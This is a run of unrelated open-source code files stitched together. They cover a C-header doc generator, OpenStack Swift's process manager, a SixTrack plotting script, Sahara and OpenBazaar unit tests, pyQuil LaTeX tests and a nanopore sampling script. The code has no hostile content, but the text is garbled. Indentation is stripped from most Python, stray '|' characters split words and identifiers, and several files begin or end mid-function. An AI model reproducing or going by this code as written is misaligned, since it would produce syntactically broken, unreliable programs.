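# def me():
#     return flask.render_template("me.html")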
|
anshulthakur/ClusterManager | src/docGen.py | Python | gpl-2.0 | 8,148 | 0.026141 | """
A script to extract description from my Code into MD format, for documentational purpose
Source format:
/**STRUCT+********************************************************************/
/* Structure: HM_NOTIFICATION_CB */
/* */
/* Name: hm_notification_cb */
/* */
/* Textname: Notification Control Block */
/* */
/* Description: A Notification Event which needs to be processed. This would */
/* be used differently in different perspectives. The same notification can */
/* be used to broadcast an update to the peers and a notification to the */
/* subscribed nodes. */
/* */
/*****************************************************************************/
typedef struct hm_notification_cb
{
/***************************************************************************/
/* Node in list */
/***************************************************************************/
HM_LQE node;
/***************************************************************************/
/* Notification Type */
/***************************************************************************/
uint16_t notification_type;
/***************************************************************************/
/* Affected CB */
/***************************************************************************/
void *node_cb;
/***************************************************************************/
/* Notification State: User specific. */
/***************************************************************************/
void *custom_data;
} HM_NOTIFICATION_CB ;
/**STRUCT-********************************************************************/
Target Format:
1. <Structure Name>(HM_NOTIFICATION_CB)
**Purpose**: <Description>
**Structure**:
```
typedef...
```
**Information**:
| Field | description |
|-------------------|---------------------------|
|node | Node in list |
|notification_type | Notification typedef|
|node_cb | Affected CB |
| custom_data | Notification State: User specific. |
"""
import sys
import os
import re
class Error(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return str(self.msg)
class Structure(object):
def __init__(self):
self.name = None #Name of structure
self.purpose = None # Description field
self.structure = None #Code, sans its comments
self.information = {} #Dictionary
## ******************** REGEXES ******************** ##
struct_start_re = re.compile(r'^.*\*STRUCT\+\**')
struct_name = re.compile(r'^.*Structure:\s*(?P<name>\w+)\s*\*/')
struct_purpose = re.compile(r'^.*Description:\s*(?P<descr>.*?)\s*\*/')
struct_purpose_line = re.compile(r'^/\*\s?(?P<line>.*)\*/')
struct_comment_boundary = re.compile(r'^/\*(\*)+\*/')
struct_start = re.compile(r'^\s?(?P<line>typedef\s+struct\s+\w+.*)')
struct_var_declaration = re.compile(r'^\s*(?P<type>\w+)\s+\*?(?P<var_name>\w+)\s*;.*')
struct_end = re.compile(r'^\s?(}\s+(?P<name>\w+)\s?;)')
struct_end_re = re.compile(r'\*STRUCT-')
## ******************** MAIN CODE ******************** ##
if len(sys.argv) != 2:
raise Error("No file specified.")
if not sys.argv[1].endswith('.h'):
raise Error("Specified file is not a header file.")
fd = open(sys.argv[1], 'r')
md_target = open('conv.md', 'w')
line_num = 0
#We have the file opened. Now read it line by line and look for beginning of structures:
looking_for_struct_start = True
finding_purpose = False
finding_info = False
current_info = ''
while 1:
line = fd.readline()
line_num +=1
if not line:
print "End of file reached."
exit()
#Are we looking for a new structure to add, or are we making an old one
if looking_for_struct_start:
match= struct_start_re.match(line)
if match is not None:
#Found structure start
print(line)
struct = Structure()
looking_for_struct_start = False
else:
if struct.name is None:
match = struct_name.match(line)
if match is not None:
struct.name = match.group('name')
continue
if struct.purpose is None or finding_purpose is True:
if struct.purpose is None:
match = struct_purpose.match(line)
if match is not None:
struct.purpose = match.group('descr')
finding_purpose = True
continue
if finding_purpose:
                match = struct_comment_boundary.match(line)
                if match is None:
                    #still inside the description block
                    match = struct_purpose_line.match(line)
                    if match is not None:
                        struct.purpose += match.group('line')
                    continue
                else:
                    #We've found our purpose (hit the closing boundary)
                    finding_purpose = False
                    continue
if not struct.information: #Empty dictionary
#start looking for information
match = struct_start.match(line)
if match is not None:
finding_info = True
struct.structure = match.group('line')
continue
if finding_info is True:
#We're parsing the code segment now.
#Search for comments before declarations
match = struct_comment_boundary.match(line)
if match is not None:
parsing_info = True
while parsing_info is True:
line = fd.readline()
line_num +=1
match = struct_comment_boundary.match(line)
if match is not None:
                            if len(current_info) == 0:
raise Error('Empty comment column at line {line}'.format(line=line_num))
else:
parsing_info = False
continue
match = struct_purpose_line.match(line)
if match is not None:
current_info += match.group('line')
continue
#Search for declarations. Add them to code
match = struct_var_declaration.match(line)
if match is not None:
struct.structure += '\n'
struct.structure += line
struct.information[match.group('var_name')] = current_info
continue
#Search for end of structure
match = struct_end.match(line)
if match is not None:
struct.structure += '\n'
struct.structure +=line
finding_info = False
current_info = ''
continue
#If it is none of these, just add it to the structure
struct.structure += '\n'
struct.structure +=line
continue
match = struct_end_re.match(line)
if match is not None:
looking_for_struct_start = True
#Write the structure as markdown
'''
1. <Structure Name>(HM_NOTIFICATION_CB)
**Purpose**: <Description>
**Structure**:
```
typedef...
```
**Information**:
| Field | description |
|-------------------|---------------------------|
|node | Node in list |
|notification_type | Notification typedef|
|node_cb | Affected CB |
| custom_data | Notification State: User specific. |
'''
            md_target.write('1. {name}\n'.format(name=struct.name))
            print('1. {name}'.format(name=struct.name))
            md_target.write(' **Purpose**: {descr}\n'.format(descr=struct.purpose))
            print(' **Purpose**: {descr}'.format(descr=struct.purpose))
            md_target.write('\n')
            print('\n')
            md_target.write(' **Structure**:\n')
            print(' **Structure**:')
            md_target.write(' ```\n')
            print(' ```')
            md_target.write(' {structure}\n'.format(structure=struct.structure))
            print(' {structure}'.format(structure=struct.structure))
            md_target.write(' ```\n')
            print(' ```')
            md_target.write(' **Information**:\n')
            print(' **Information**:')
            md_target.write(' | Field | description |\n')
            print(' | Field | description |')
            md_target.write(' |-------|--------------|\n')
            print(' |-------|--------------|')
            for key, value in struct.information.items():
                md_target.write(' | {key} | {value} |\n'.format(key=key, value=value))
                print(' | {key} | {value} |'.format(key=key, value=value))
#Out of the loop now
fd.close()
md_target.close()
garvenshen/zeda-swift | swift/common/manager.py | Python | apache-2.0 | 21,270 | 0.000047 | # Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
import functools
import errno
import os
import resource
import signal
import time
import subprocess
import re
from swift.common.utils import search_tree, remove_file, write_file
SWIFT_DIR = '/etc/swift'
RUN_DIR = '/var/run/swift'
# auth-server has been removed from ALL_SERVERS, start it explicitly
ALL_SERVERS = ['account-auditor', 'account-server', 'container-auditor',
'container-replicator', 'container-server', 'container-sync',
'container-updater', 'object-auditor', 'object-server',
'object-expirer', 'object-replicator', 'object-updater',
'proxy-server', 'account-replicator', 'account-reaper']
MAIN_SERVERS = ['proxy-server', 'account-server', 'container-server',
'object-server']
REST_SERVERS = [s for s in ALL_SERVERS if s not in MAIN_SERVERS]
GRACEFUL_SHUTDOWN_SERVERS = MAIN_SERVERS + ['auth-server']
START_ONCE_SERVERS = REST_SERVERS
# These are servers that match a type (account-*, container-*, object-*) but
# don't use that type-server.conf file and instead use their own.
STANDALONE_SERVERS = ['object-expirer']
KILL_WAIT = 15 # seconds to wait for servers to die (by default)
WARNING_WAIT = 3 # seconds to wait after message that may just be a warning
MAX_DESCRIPTORS = 32768
MAX_MEMORY = (1024 * 1024 * 1024) * 2 # 2 GB
def setup_env():
"""Try to increase resource limits of the OS. Move PYTHON_EGG_CACHE to /tmp
"""
try:
resource.setrlimit(resource.RLIMIT_NOFILE,
(MAX_DESCRIPTORS, MAX_DESCRIPTORS))
resource.setrlimit(resource.RLIMIT_DATA,
(MAX_MEMORY, MAX_MEMORY))
except ValueError:
print _("WARNING: Unable to increase file descriptor limit. "
"Running as non-root?")
os.environ['PYTHON_EGG_CACHE'] = '/tmp'
def command(func):
"""
Decorator to declare which methods are accessible as commands, commands
always return 1 or 0, where 0 should indicate success.
:param func: function to make public
"""
func.publicly_accessible = True
@functools.wraps(func)
def wrapped(*a, **kw):
rv = func(*a, **kw)
return 1 if rv else 0
return wrapped
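# For illustration, a method declared as
#
#   @command
#   def start(self, **kwargs):
#       ...
#
# is marked publicly accessible and has its return value collapsed to 0/1,
# matching shell exit-code conventions (any truthy result becomes 1).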
def watch_server_pids(server_pids, interval=1, **kwargs):
"""Monitor a collection of server pids yeilding back those pids | that
aren't responding to signals.
:param server_pids: a dict, lists of pids [int,...] keyed on
Server objects
"""
    status = {}
start = time.time()
end = start + interval
server_pids = dict(server_pids) # make a copy
while True:
for server, pids in server_pids.items():
for pid in pids:
try:
# let pid stop if it wants to
os.waitpid(pid, os.WNOHANG)
except OSError, e:
if e.errno not in (errno.ECHILD, errno.ESRCH):
raise # else no such child/process
# check running pids for server
status[server] = server.get_running_pids(**kwargs)
for pid in pids:
# original pids no longer in running pids!
if pid not in status[server]:
yield server, pid
# update active pids list using running_pids
server_pids[server] = status[server]
if not [p for server, pids in status.items() for p in pids]:
# no more running pids
break
if time.time() > end:
break
else:
time.sleep(0.1)
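# Rough usage sketch (illustrative; ``server`` would be a Server instance
# from below, 1234 a real child pid):
#
#   for server, pid in watch_server_pids({server: [1234]}, interval=KILL_WAIT):
#       print _('%s (%s) appears to have stopped') % (server, pid)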
class UnknownCommandError(Exception):
pass
class Manager():
"""Main class for performing commands on groups of servers.
:param servers: list of server names as strings
"""
def __init__(self, servers, run_dir=RUN_DIR):
server_names = set()
for server in servers:
if server == 'all':
server_names.update(ALL_SERVERS)
elif server == 'main':
server_names.update(MAIN_SERVERS)
elif server == 'rest':
server_names.update(REST_SERVERS)
elif '*' in server:
# convert glob to regex
server_names.update([s for s in ALL_SERVERS if
re.match(server.replace('*', '.*'), s)])
else:
server_names.add(server)
self.servers = set()
for name in server_names:
self.servers.add(Server(name, run_dir))
@command
def status(self, **kwargs):
"""display status of tracked pids for server
"""
status = 0
for server in self.servers:
status += server.status(**kwargs)
return status
@command
def start(self, **kwargs):
"""starts a server
"""
setup_env()
status = 0
for server in self.servers:
server.launch(**kwargs)
if not kwargs.get('daemon', True):
for server in self.servers:
try:
status += server.interact(**kwargs)
except KeyboardInterrupt:
print _('\nuser quit')
self.stop(**kwargs)
break
elif kwargs.get('wait', True):
for server in self.servers:
status += server.wait(**kwargs)
return status
@command
def no_wait(self, **kwargs):
"""spawn server and return immediately
"""
kwargs['wait'] = False
return self.start(**kwargs)
@command
def no_daemon(self, **kwargs):
"""start a server interactively
"""
kwargs['daemon'] = False
return self.start(**kwargs)
@command
def once(self, **kwargs):
"""start server and run one pass on supporting daemons
"""
kwargs['once'] = True
return self.start(**kwargs)
@command
def stop(self, **kwargs):
"""stops a server
"""
server_pids = {}
for server in self.servers:
signaled_pids = server.stop(**kwargs)
if not signaled_pids:
print _('No %s running') % server
else:
server_pids[server] = signaled_pids
# all signaled_pids, i.e. list(itertools.chain(*server_pids.values()))
signaled_pids = [p for server, pids in server_pids.items()
for p in pids]
        # keep track of the pids yielded back as killed for all servers
killed_pids = set()
kill_wait = kwargs.get('kill_wait', KILL_WAIT)
for server, killed_pid in watch_server_pids(server_pids,
interval=kill_wait,
**kwargs):
print _("%s (%s) appears to have stopped") % (server, killed_pid)
killed_pids.add(killed_pid)
if not killed_pids.symmetric_difference(signaled_pids):
                # all processes have been stopped
return 0
        # reached end of interval in watch_server_pids w/o killing all servers
for server, pids in server_pids.items():
if not killed_pids.issuperset(pids):
# some pids of this server were not killed
print _('Waited %s seconds for %s to die; giving up') % (
kill_wait, server)
return 1
@command
def shutdown(self, **kwargs):
"""allow current requests to finish on suppo |
SixTrack/SixTrack | test/chebythin6d/cheby_plot_map.py | Python | lgpl-2.1 | 3,183 | 0.051838 | '''
color code of points:
- black: outside R2 or inside R1 (check);
- colored: inside R2 and outside R1 (check);
- magenta: outside R2 or inside R1 (check) but wronlgy labelled as inside;
- white: inside R2 and outside R1 (check) but wronlgy labelled as outside;
'''
import matplotlib.pyplot as plt
import numpy as np
chebyNames=['cheby1','cheby2','cheby3','cheby4']
coords=['local','map']
offx=[0,-2, 1,0]
offy=[0, 2,-1,0]
R1=[0.25,0.7,0.0,0.5] # [mm]
R2=[3.2,3.2,3.0,3.2] #[mm]
cAngles=np.deg2rad([0,0,-90,160])# [deg to rad]
nRows=nCols=round(len(chebyNames)/2.)
epsilon=1E-15
gteps=1+epsilon
lteps=1-epsilon
pc=450E3 # [MeV]
clight=2.99792458E8 # [m/s]
mass=0.938272310E3 # [MeV/c2]
Brho=pc/(clight*1E-6) # [Tm]
betaRel=np.sqrt(1-1/(1+(pc/mass)**2))
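# sanity check on the constants above: for pc = 450 GeV and a proton mass of
# ~0.938 GeV, Brho ~ 1501 Tm and betaRel ~ 0.9999978, i.e. ultra-relativistic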
plt.figure('cheby_map',figsize=(20,10))
for jj in range(len(chebyNames)):
    mapIn = np.loadtxt('cheby%s_pot.dat'%(jj+1))
ids_in=np.where(mapIn[:,5]!=0)[0] # flagged as in by 6T
ids_out=np.where(mapIn[:,5]==0)[0] # flagged as out by 6T
xx=mapIn[:,0]-offx[jj]
yy=mapIn[:,1]-offy[jj]
angles=np.arctan2(yy,xx)-cAngles[jj]
rr=np.sqrt(xx**2+yy**2)
xx=rr*np.cos(angles)
yy=rr*np.sin(angles)
xx=np.absolute(xx)
yy=np.absolute(yy)
    idc_out=np.where( np.logical_or( np.logical_and(xx<R1[jj]*lteps,yy<R1[jj]*lteps), np.logical_or(xx>R2[jj]*gteps,yy>R2[jj]*gteps) )) [0]
idc_in =np.where(np.logical_not( np.logical_or( np.logical_and(xx<R1[jj]*lteps,yy<R1[jj]*lteps), np.logical_or(xx>R2[jj]*gteps,yy>R2[jj]*gteps) )))[0]
for ii in range(len(coords)):
plt.subplot(nRows,nCols*len(coords),ii+jj*len(coords)+1)
# points outside domain (black)
plt.scatter(mapIn[:,0+ii*2][idc_out],mapIn[:,1+ii*2][idc_out],c='k',edgecolors='none')#, vmin=-3E-11, vmax=3E11)
# non-zero kicks at points outside domain (magenta)
if ( len(idc_out)!=0 ):
idrr=np.where(mapIn[:,5][idc_out]!=0)[0]
if (len(idrr)>0):
print ' in map of lens %s there are some points wrongly identified as belonging to domain defined by radii [%g,%g] when they are not... '%(chebyNames[jj],R1[jj],R2[jj])
plt.scatter(mapIn[:,0+ii*2][idc_out][idrr],mapIn[:,1+ii*2][idc_out][idrr],c='m',edgecolors='none')#, vmin=-3E-11, vmax=3E11)
# zero kicks at points inside domain (white)
if ( len(idc_in)!=0 ):
idrr=np.where(mapIn[:,5][idc_in]==0)[0]
if (len(idrr)>0):
print ' in map of lens %s there are some points wrongly identified as outside domain defined by ref radii [%g,%g] when they are not... '%(chebyNames[jj],R1[jj],R2[jj])
plt.scatter(mapIn[:,0+ii*2][idc_in][idrr],mapIn[:,1+ii*2][idc_in][idrr],c='w',edgecolors='none')#, vmin=-3E-11, vmax=3E11)
idrr=np.where(mapIn[:,5][idc_in]!=0)[0]
# points inside domain (colored)
plt.scatter(mapIn[:,0+ii*2][idc_in][idrr],mapIn[:,1+ii*2][idc_in][idrr],c=mapIn[:,4][idc_in][idrr],edgecolors='none')#, vmin=-3E-11, vmax=3E11)
plt.xlabel('x [mm]')
plt.ylabel('y [mm]')
plt.axis('equal')
# plt.legend(loc='best',fontsize=10)
plt.tight_layout()
plt.colorbar()
plt.grid()
plt.clim(-190,-130)
plt.title('%s - %s ref sys [V m]'%(chebyNames[jj],coords[ii]))
plt.show()
|
openstack/sahara | sahara/tests/unit/service/edp/data_sources/base_test.py | Python | apache-2.0 | 2,415 | 0.00207 | # Copyright (c) 2017 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
from oslo_utils import uuidutils
from sahara.service.edp.data_sources.base import DataSourceType
import testtools
class DataSourceBaseTestCase(testtools.TestCase):
def setUp(self):
super(DataSourceBaseTestCase, self).setUp()
self.ds_base = DataSourceType()
def test_construct_url_no_placeholders(self):
base_url = "swift://container/in | put"
job_exec_id = uuidutils.generate_uuid()
url = self.ds_base.construct_url(base_url, job_exec_id)
self.assertEqual(base_url, url)
def test_construct_url_job_exec_id_placeholder(self):
base_url = "swift://container/input.%JOB_EXEC_ID%.out"
job_exec_id = uuidutils.generate_uuid()
url = self.ds_base.construct_url(base_url, job_exec_id)
self.assertEqual(
"swift://container/input." + job_exec_id + ".out", url)
def test_construct_url_randstr_placeholder(self):
base_url = "swift://container/input.%RANDSTR(4)%.%RANDSTR(7)%.out"
job_exec_id = uuidutils.generate_uuid()
url = self.ds_base.construct_url(base_url, job_exec_id)
self.assertRegex(
url, "swift://container/input\.[a-z]{4}\.[a-z]{7}\.out")
def test_construct_url_randstr_and_job_exec_id_placeholder(self):
base_url = "swift://container/input.%JOB_EXEC_ID%.%RANDSTR(7)%.out"
job_exec_id = uuidutils.generate_uuid()
url = self.ds_base.construct_url(base_url, job_exec_id)
self.assertRegex(
url, "swift://container/input." + job_exec_id + "\.[a-z]{7}\.out")
def test_get_urls(self):
url = 'test://url'
cluster = mock.Mock()
job_exec_id = 'test_id'
self.assertEqual((url, url), self.ds_base.get_urls(url,
cluster, job_exec_id))
|
akhavr/OpenBazaar | tests/test_db_store.py | Python | mit | 5,980 | 0.000502 | import os
import tempfile
import unittest
from node import db_store, setup_db
class TestDbOperations(unittest.TestCase):
"""Test DB operations in an unencrypted DB."""
disable_sqlite_crypt = True
@classmethod
def setup_path(cls):
cls.db_dir = tempfile.mkdtemp()
cls.db_path = os.path.join(cls.db_dir, 'testdb.db')
@classmethod
def setup_db(cls):
setup_db.setup_db(
cls.db_path,
disable_sqlite_crypt=cls.disable_sqlite_crypt
)
@classmethod
def setUpClass(cls):
cls.setup_path()
cls.setup_db()
@classmethod
def tearDownClass(cls):
os.remove(cls.db_path)
os.rmdir(cls.db_dir)
def setUp(self):
        self.db = db_store.Obdb(
self.db_path,
disable_sqlite_crypt=self.disable_sqlite_crypt
)
def test_insert_select_operations(self):
        # Create a dictionary of a random review
review_to_store = {"pubKey": "123",
"subject": "A review",
"signature": "a signature",
"text": "Very happy to be a customer.",
"rating": 10}
# Use the insert operation to add it to the db
self.db.insert_entry("reviews", review_to_store)
# Try to retrieve the record we just added based on the pubkey
retrieved_review = self.db.select_entries("reviews", {"pubkey": "123"})
# The above statement will return a list with all the
# retrieved records as dictionaries
self.assertEqual(len(retrieved_review), 1)
retrieved_review = retrieved_review[0]
# Is the retrieved record the same as the one we added before?
self.assertEqual(
review_to_store["pubKey"],
retrieved_review["pubKey"],
)
self.assertEqual(
review_to_store["subject"],
retrieved_review["subject"],
)
self.assertEqual(
review_to_store["signature"],
retrieved_review["signature"],
)
self.assertEqual(
review_to_store["text"],
retrieved_review["text"],
)
self.assertEqual(
review_to_store["rating"],
retrieved_review["rating"],
)
# Let's do it again with a malicious review.
review_to_store = {"pubKey": "321",
"subject": "Devil''''s review",
"signature": "quotes\"\"\"\'\'\'",
"text": 'Very """"happy"""""" to be a customer.',
"rating": 10}
# Use the insert operation to add it to the db
self.db.insert_entry("reviews", review_to_store)
# Try to retrieve the record we just added based on the pubkey
retrieved_review = self.db.select_entries("reviews", {"pubkey": "321"})
# The above statement will return a list with all the
# retrieved records as dictionaries
self.assertEqual(len(retrieved_review), 1)
retrieved_review = retrieved_review[0]
# Is the retrieved record the same as the one we added before?
self.assertEqual(
review_to_store["pubKey"],
retrieved_review["pubKey"],
)
self.assertEqual(
review_to_store["subject"],
retrieved_review["subject"],
)
self.assertEqual(
review_to_store["signature"],
retrieved_review["signature"],
)
self.assertEqual(
review_to_store["text"],
retrieved_review["text"],
)
self.assertEqual(
review_to_store["rating"],
retrieved_review["rating"],
)
# By ommiting the second parameter, we are retrieving all reviews
all_reviews = self.db.select_entries("reviews")
self.assertEqual(len(all_reviews), 2)
# Use the <> operator. This should return the review with pubKey 123.
retrieved_review = self.db.select_entries(
"reviews",
{"pubkey": {"value": "321", "sign": "<>"}}
)
self.assertEqual(len(retrieved_review), 1)
retrieved_review = retrieved_review[0]
self.assertEqual(
retrieved_review["pubKey"],
"123"
)
def test_get_or_create_record_when_not_exists(self):
record = {"city": "Zurich"}
table = "settings"
retrieved_record = self.db.get_or_create(table, record)
self.assertEqual(retrieved_record["city"], record["city"])
# check that the missing fields were created as empty
self.assertEqual(retrieved_record["countryCode"], "")
def test_update_operation(self):
# Retrieve the record with pubkey equal to '123'
retrieved_review = self.db.select_entries("reviews", {"pubkey": "321"})[0]
# Check that the rating is still '10' as expected
self.assertEqual(retrieved_review["rating"], 10)
# Update the record with pubkey equal to '123'
# and lower its rating to 9
self.db.update_entries("reviews", {"rating": 9}, {"pubkey": "123"})
# Retrieve the same record again
retrieved_review = self.db.select_entries("reviews", {"pubkey": "123"})[0]
# Test that the rating has been updated succesfully
self.assertEqual(retrieved_review["rating"], 9)
def test_delete_operation(self):
# Delete the entry with pubkey equal to '123'
self.db.delete_entries("reviews", {"pubkey": "123"})
# Looking for this record with will bring nothing
retrieved_review = self.db.select_entries("reviews", {"pubkey": "123"})
self.assertEqual(len(retrieved_review), 0)
class TestCryptDbOperations(TestDbOperations):
"""Test DB operations in an encrypted DB."""
disable_sqlite_crypt = False
if __name__ == '__main__':
unittest.main()
|
rigetticomputing/pyquil | pyquil/latex/tests/test_latex.py | Python | apache-2.0 | 4,016 | 0.001245 | import pytest
from pyquil.quil import Program, Pragma
from pyquil.quilbase import Declare, Measurement, JumpTarget, Jump
from pyquil.quilatom import MemoryReference, Label
from pyquil.gates import H, X, Y, RX, CZ, SWAP, MEASURE, CNOT, WAIT, MOVE
from pyquil.latex import to_latex, DiagramSettings
from pyquil.latex._diagram import split_on_terminal_measures
def test_to_latex():
"""A test to give full coverage of latex_generation."""
p = Program()
p.inst(
X(0),
RX(1.0, 5),
Y(0),
CZ(0, 2),
SWAP(0, 1),
MEASURE(0, None),
CNOT(2, 0),
X(0).controlled(1),
Y(0).dagger(),
)
_ = to_latex(p)
# Modify settings to access non-standard control paths.
settings = DiagramSettings(impute_missing_qubits=True)
_ = to_latex(p, settings)
settings = DiagramSettings(abbreviate_controlled_rotations=True)
_ = to_latex(p, settings)
settings = DiagramSettings(label_qubit_lines=False)
_ = to_latex(p, settings)
def test_fail_on_forked():
"""Check that to_latex raises an exception on FORKED gates."""
p = Program()
    p.inst(RX(1.0, 0).forked(1, [2.0]))
with pytest.raises(ValueError):
_ = to_latex(p)
def test_gate_group_pragma():
"Check that to_lat | ex does not fail on LATEX_GATE_GROUP pragma."
p = Program()
p.inst(Pragma("LATEX_GATE_GROUP", [], "foo"), X(0), X(0), Pragma("END_LATEX_GATE_GROUP"), X(1))
_ = to_latex(p)
def test_fail_on_bad_pragmas():
"Check that to_latex raises an error when pragmas are imbalanced."
# missing END_LATEX_GATE_GROUP
with pytest.raises(ValueError):
_ = to_latex(Program(Pragma("LATEX_GATE_GROUP", [], "foo"), X(0)))
# missing LATEX_GATE_GROUP
with pytest.raises(ValueError):
_ = to_latex(Program(X(0), Pragma("END_LATEX_GATE_GROUP")))
# nested groups are not currently supported
with pytest.raises(ValueError):
_ = to_latex(
Program(
Pragma("LATEX_GATE_GROUP"),
X(0),
Pragma("LATEX_GATE_GROUP"),
X(1),
Pragma("END_LATEX_GATE_GROUP"),
Pragma("END_LATEX_GATE_GROUP"),
)
)
def test_warn_on_pragma_with_trailing_measures():
"Check that to_latex warns when measurement alignment conflicts with gate group pragma."
with pytest.warns(UserWarning):
_ = to_latex(
Program(
Declare("ro", "BIT"),
Pragma("LATEX_GATE_GROUP"),
MEASURE(0, MemoryReference("ro")),
Pragma("END_LATEX_GATE_GROUP"),
MEASURE(1, MemoryReference("ro")),
)
)
def test_split_measures():
"""Check that we can split terminal measurements."""
prog = Program(
Declare("ro", "BIT"),
X(0),
MEASURE(0, MemoryReference("ro")),
X(1),
MEASURE(1, MemoryReference("ro")),
)
meas, instr = split_on_terminal_measures(prog)
assert len(meas) == 2
assert len(instr) == 3
assert all(isinstance(instr, Measurement) for instr in meas)
def test_unsupported_ops():
target = Label("target")
base_prog = Program(
Declare("reg1", "BIT"), Declare("reg2", "BIT"), H(0), JumpTarget(target), CNOT(0, 1)
)
bad_ops = [WAIT, Jump(target), MOVE(MemoryReference("reg1"), MemoryReference("reg2"))]
assert to_latex(base_prog)
for op in bad_ops:
prog = base_prog + op
with pytest.raises(ValueError):
_ = to_latex(prog)
def test_controlled_gate():
prog = Program(H(2).controlled(3))
# This is hardcoded, but better than nothing
expected = r"""
\begin{tikzcd}
\lstick{\ket{q_{2}}} & \gate{H} & \qw \\
\lstick{\ket{q_{3}}} & \ctrl{-1} & \qw
\end{tikzcd}
""".strip().split()
actual = to_latex(prog).split()
start_idx = actual.index("\\begin{tikzcd}")
assert expected == actual[start_idx : start_idx + len(expected)]
|
mitschabaude/nanopores | scripts/pughpore/new_sobol_points.py | Python | mit | 6,272 | 0.064413 | import sys
from math import sqrt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
#from numpy.random import random
import matplotlib.pyplot as plt
from folders import fields
import nanopores.geometries.pughpore as pughpore
import nanopores
from sobol.sobol_seq import i4_sobol_generate as sobol
up = nanopores.user_params(pughpore.params, k=3)
R = up.R
H = up.H
l0 = up.l0
l1 = up.l1
l2 = up.l2
l3 = up.l3
l4 = up.l4
hpore = up.hpore
hmem = up.hmem
h2 = up.h2
h1 = up.h1
h4 = up.h4
rMolecule = up.rMolecule
eps = 0.1
r = rMolecule + eps
p0=hpore/2.
p1=p0-h1
p2=p0-h2
p3=-hpore/2.
def fac(z):
if z>=p3 and z<=p2:
return l3/2.-r
elif z>p2 and z<p2+r:
x=z-p2
return -sqrt(r**2-x**2)+l3/2.
elif z>=p2+r and z<=p1:
return l2/2.-r
elif z>p1 and z<p1+r:
x=z-p1
return -sqrt(r**2-x**2)+l2/2.
elif z>=p1+r and z<=p0:
return l0/2.-r
elif z>p0 and z<p0+r:
x=z-p0
return -sqrt(r**2-x**2)+l0/2.
elif z<p3 and z>p3-r:
x=z-p3
return -sqrt(r**2-x**2)+l3/2.
else: return R/2.
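# Spot checks of the piecewise radius above: inside the narrowest section
# (p3 <= z <= p2) fac returns l3/2. - r; across each shoulder it follows a
# circular arc of radius r; far outside the pore (z >= p0 + r or z <= p3 - r)
# it falls back to R/2.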
k0=3
n=5
#k=up.k
k=0
z=sobol(1,2**n,0)[0]
z=(hpore+30.)*z-hpore/2.-10.
factors=np.array([fac(x) for x in z])
#def R_(z):
# if z>=p3 and z<=p2:
# return l3/2.
# elif z>=p2 and z<=p1:
# return l2/2.
# elif z>=p1 and z<=p0:
# return l0/2.
# else: return R/2.
#
#X=np.linspace(-H/2.,H/2.,800)
#Y=np.array([fac(X[i]) for i in range(X.shape[0])])
#plt.plot(X,Y)
#plt.plot(X,np.array([R_(X[i]) for i in range(X.shape[0])]),color='r')
#plt.scatter(z,np.zeros(2**n))
#plt.scatter(z,factors)
#plt.show()
XY = sobol(2,2**k0,0)
X_points,Y_points = XY[0],XY[1]
for i in range(k+1): # additional points
XY = sobol(2,2**(i+k0),2**(i+k0))
X_points = np.append(X_points,XY[0])
Y_points = np.append(Y_points,XY[1])
for i in list(reversed(range(X_points.shape[0]))): # cut off other triangle
if Y_points[i]>X_points[i]:
X_points = np.delete(X_points,i)
Y_points = np.delete(Y_points,i)
print '# points in plane = %d\n# z-values = %d\n# total points = %d'%(
X_points.shape[0],z.shape[0],X_points.shape[0]*z.shape[0])
X, Y, Z = np.array([]), np.array([]), np.array([]) # concatenate all arrays
for j in range(z.shape[0]):
Z_p=np.zeros(X_points.shape[0])+z[j]
X_p = X_points*factors[j]
Y_p = Y_points*factors[j]
X = np.append(X,X_p)
Y = np.append(Y,Y_p)
Z = np.append(Z,Z_p)
array=[[X[i],Y[i],Z[i]] for i in range(X.shape[0])]
if __name__ == "__main__":
fields.save_entries("pughx_new", dict(up), x=array, N=len(array))
fields.update()
def surfx(y1,y2,z1,z2,d,size,rs,cs):
Y = np.linspace(y1,y2,size)
Z = np.linspace(z1,z2,size)
Y, Z = np.meshgrid(Y,Z)
X = np.zeros(size)+d
surf = ax.plot_surface(X,Y,Z, rstride=rs, cstride=cs,
alpha=alpha,color=color)
def surfy(x1,x2,z1,z2,d,size,rs,cs):
X = np.linspace(x1,x2,size)
Z = np.linspace(z1,z2,size)
X, Z = np.meshgrid(X,Z)
Y = np.zeros(size)+d
surf = ax.plot_surface(X,Y,Z, rstride=rs, cstride=cs,
alpha=alpha,color=color)
def surfz(x1,x2,y1,y2,d,size,rs,cs):
X = np.linspace(x1,x2,size)
Y = np.linspace(y1,y2,size)
X, Y = np.meshgrid(X,Y)
Z = np.zeros(size)+d
surf = ax.plot_surface(X,Y,Z, rstride=rs, cstride=cs,
alpha=alpha,color=color)
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.view_init(elev=0,azim=270)
ax.set_xlim([-.5*R,.5*R])
ax.set_ylim([-.5*R,.5*R])
ax.set_zlim([-.5*H,.5*H])
#ax.set_aspect(1)
size=10
alpha=.1
rs, cs = 1, 1
color='blue'
#front
surfy(-.5*l3,.5*l3,-.5*hpore,.5*hpore-h2,.5*l3,size,1,1)
surfy(-.5*l2,.5*l2,.5*hpore-h2,.5*hpore-h1,.5*l2,size,5,1)
surfy(-.5*l1,.5*l1,.5*hpore-h1,.5*hpore,.5*l1,size,10,1)
surfy(.5*l0,-.5*l0,-.5*hpore+hmem,.5*hpore,.5*l0,size,5,5)
#front-right
surfy(.5*l3,.5*l2,-.5*hpore,.5*hpore-h2,0.,size,5,5)
surfy(.5*l2,.5*l1,-.5*hpore,.5*hpore-h1,0.,size,5,5)
surfy(.5*l1,.5*l0,-.5*hpore+hmem,.5*hpore,0.,size,5,5)
